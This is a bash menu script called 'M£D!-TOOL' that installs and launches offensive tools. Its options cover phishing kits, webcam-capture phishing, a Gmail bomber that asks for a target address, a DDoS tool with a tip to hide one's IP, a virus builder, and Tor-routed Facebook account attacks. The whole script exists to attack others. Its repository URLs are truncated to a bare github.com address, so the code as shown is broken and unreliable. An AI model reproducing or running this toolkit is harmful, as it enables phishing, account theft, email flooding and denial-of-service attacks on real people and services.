#!/bin/bash
mkdir -p Tools
clear 
echo -e '\033[31;40;1m 
 ███╗   ███╗███████╗██████╗ ██╗               ████████╗ ██████╗  ██████╗ ██╗
████╗ ████║██╔════╝██╔══██╗██║               ╚══██╔══╝██╔═══██╗██╔═══██╗██║
██╔████╔██║█████╗  ██║  ██║██║   ███████╗       ██║   ██║   ██║██║   ██║██║
██║╚██╔╝██║██╔══╝  ██║  ██║██║   ╚══════╝       ██║   ██║   ██║██║   ██║██║
██║ ╚═╝ ██║███████╗██████╔╝██║                  ██║   ╚██████╔╝╚██████╔╝███████╗
╚═╝     ╚═╝╚══════╝╚═════╝ ╚═╝                  ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝
  Coded by M£D!
  github: https://github.com
\033[33;4mVersion:\033[0m 4            \033[33;4mCTRL+C:\033[0m exit          \033[33;4mAuthor:\033[0m M£D!

\e[37m[1]\e[36m Requests & Update            \e[37m[2]\e[36m Phishing Tool				
\e[37m[3]\e[36m WebCam Hack                   \e[37m[4]\e[36m Subscan			
\e[37m[5]\e[36m Gmail Bomber		  \e[37m[6]\e[36m DDOS Attack			
\e[37m[7]\e[36m How to use   ?	          \e[37m[8]\e[36m Uninstall programs	
\e[37m[9]\e[36m Ip Info	                  \e[37m[10]\e[36m dorks-eye
\e[37m[11]\e[36m HackerPro                    \e[37m[12]\e[36m RED_HAWK
\e[37m[13]\e[36m VirusCrafter                 \e[37m[14]\e[36m Info-Site
\e[37m[15]\e[36m BadMod	                  \e[37m[16]\e[36m Facebash
\e[37m[17]\e[36m DARKARMY                     \e[37m[18]\e[36m AUTO-IP-CHANGER

'

read -p "Transaction number: " islem

if [[ $islem == 1 || $islem == 01 ]]; then
    clear
    echo -e "\033[47;31;5m Installing the update and requirements...\033[0m"
    sleep 5
    pkg install git -y
    pkg install python python3 -y
    pkg install pip pip3 -y
    pkg install curl -y
    apt update
    apt upgrade -y
    clear
    echo -e "\033[47;3;35m Full update...\033[0m"
    sleep 3
    bash "M£D!-TOOL.sh"

elif [[ $islem == 2 || $islem == 02 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd zphisher
    bash zphisher.sh
    cd ../..

elif [[ $islem == 3 || $islem == 03 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd CamPhish
    bash camphish.sh
    cd ../..

elif [[ $islem == 4 || $islem == 04 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    git clone https://github.com
    cd subscan
    read -p "Jepni nje domain p.sh (example.com): " sc
    ./subscan $sc
    cd ..
       
elif [[ $islem == 5 || $islem == 05 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd fast-mail-bomber/
    mv config.example.php config.php
    php index.php update-providers
    rm -rf data/nodes.json data/dead_providers.json
    echo -e "\033[47;3;35m Ky instalim do tju marre shum kohe\033[0m"
    echo -e "\033[47;3;35m Per te ndaluar shtypni Ctrl+C\033[0m"
    sleep 4
    php index.php update-nodes
    php index.php refine-nodes
    echo "-------------------------"
    read -p "Give the email addres that u wnat to bom: " mail
    echo "-------------------------"
    php index.php start-bombing $mail
    cd ../..

elif [[ $islem == 6 || $islem == 06 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd DDoS-Ripper
    python3 DRipper.py
    echo ""
    echo -e "\033[47;3;35m Before using hide ur ip plase\033[0m"
    cd ../..

elif [[ $islem == 7 || $islem == 07 ]]; then
    clear
    echo "Youtube Video: https://youtube.com"
    python3 -m webbrowser https://youtube.com
    sleep 10
    echo "Wait 10 sec"
    bash "M£D!-TOOL.sh"
 
elif [[ $islem == 8 || $islem == 08 ]]; then
    clear
    echo -e "\033[47;3;35m REMOVING INSTALLED PROGRAMS...\033[0m"
    sleep 3 
    rm -rf Tools
    bash "M£D!-TOOL.sh"

elif [[ $islem == 9 || $islem == 09 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    apt update
    apt install git curl -y
    git clone https://github.com
    cd track-ip
    bash trackip
    cd ../..

elif [[ $islem == 10 || $islem == 010 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd dorks-eye
    pip install -r requirements.txt
    python3 dorks-eye.py
    cd ../..

elif [[ $islem == 11 || $islem == 011 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    apt update && apt upgrade -y && apt install git -y && apt install python2 -y
    git clone https://github.com
    cd hackerpro
    sudo bash install.sh
    python2 hackerpro.py
    cd ../..

elif [[ $islem == 12 || $islem == 012 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd RED_HAWK
    php rhawk.php
    cd ../..

elif [[ $islem == 13 || $islem == 013 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    apt update
    apt upgrade -y
    pkg install git -y
    cd TigerVirus
    bash app.sh
    cd ../..

elif [[ $islem == 14 || $islem == 014 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    pkg install curl -y
    pkg upgrade -y
    pkg install git -y
    git clone https://github.com
    cd info-site
    bash info.sh
    cd ../..

elif [[ $islem == 15 || $islem == 015 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    sudo apt-get update
    sudo apt-get install php -y
    sudo apt-get install php-curl -y
    git clone https://github.com
    cd BadMod
    chmod u+x INSTALL
    chmod u+x BadMod.php
    sudo php BadMod.php
    cd ../..

elif [[ $islem == 16 || $islem == 016 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    git clone https://github.com
    cd facebash
    bash install.sh
    chmod +x facebash.sh
    tor &
    sleep 2
    sudo ./facebash.sh
    cd ../..

elif [[ $islem == 17 || $islem == 017 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    sleep 3
    cd Tools
    pkg install git -y
    pkg install python2 -y
    apt install git -y
    apt install python2 -y
    git clone https://github.com
    cd DARKARMY
    chmod +x darkarmy.py
    python2 darkarmy.py
    cd ../..

elif [[ $islem == 18 || $islem == 018 ]]; then
    clear
    echo -e "\033[47;3;35m INSTALLING CAN TAKE SOME TIME\033[0m"
    echo -e "\033[47;3;35m U NEED TO BE ROOT\033[0m"
    sleep 3
    cd Tools
    sudo apt-get install tor -y
    pip3 install requests
    git clone https://github.com
    cd Auto_Tor_IP_changer
    echo -e "\033[47;3;35m Go to your browser / change the proxy (socks proxy) to 127.0.0.1:9050\033[0m"
    sleep 8
    python3 install.py
    aut
    cd ../..

else   
    clear
    echo -e '\033[36;40;1m WRONG CODE'	
    sleep 1
    clear 
    bash "M£D!-TOOL.sh"
fi
